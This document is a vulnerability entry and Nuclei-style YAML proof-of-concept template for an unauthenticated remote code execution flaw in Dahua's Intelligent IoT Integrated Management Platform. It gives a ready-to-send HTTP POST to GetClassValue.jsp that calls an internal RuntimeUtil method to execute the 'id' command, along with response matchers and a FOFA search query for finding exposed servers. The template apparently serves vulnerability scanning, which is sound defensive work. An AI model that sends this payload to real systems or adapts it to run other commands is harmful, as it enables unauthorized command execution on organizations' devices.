漏洞描述
Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
dahua-icc-getclassvalue-rce: Dahua 'GetClassValue' - Remote Code Execution
PoC代码[已公开]
id: dahua-icc-getclassvalue-rce
info:
name: Dahua 'GetClassValue' - Remote Code Execution
author: ProjectDiscoveryAI
severity: critical
description: |
Remote Code Execution Vulnerability in Dahua Intelligent IoT Integrated Management Platform via GetClassValue.jsp.
reference:
- https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/dahua-icc-getclassvalue-rce.yaml
metadata:
fofa-query: app="dahua-智能物联综合管理平台"
max-request: 1
tags: rce,java,dahua,iot,unauth,vuln
http:
- raw:
- |
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"data": {
"clazzName": "com.dahua.admin.util.RuntimeUtil",
"methodName": "syncexecReturnInputStream",
"fieldName": ["id"]
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4a0a00473045022100a04a5b9873314a5d667a1576ca0fbea59fd3ec0733738d0fedf528f50921ee26022051adc86d702abe35751b182adbfbedc9d49149375bf823ad10c90c64f894e466:922c64590222798bb761d5b6d8e72950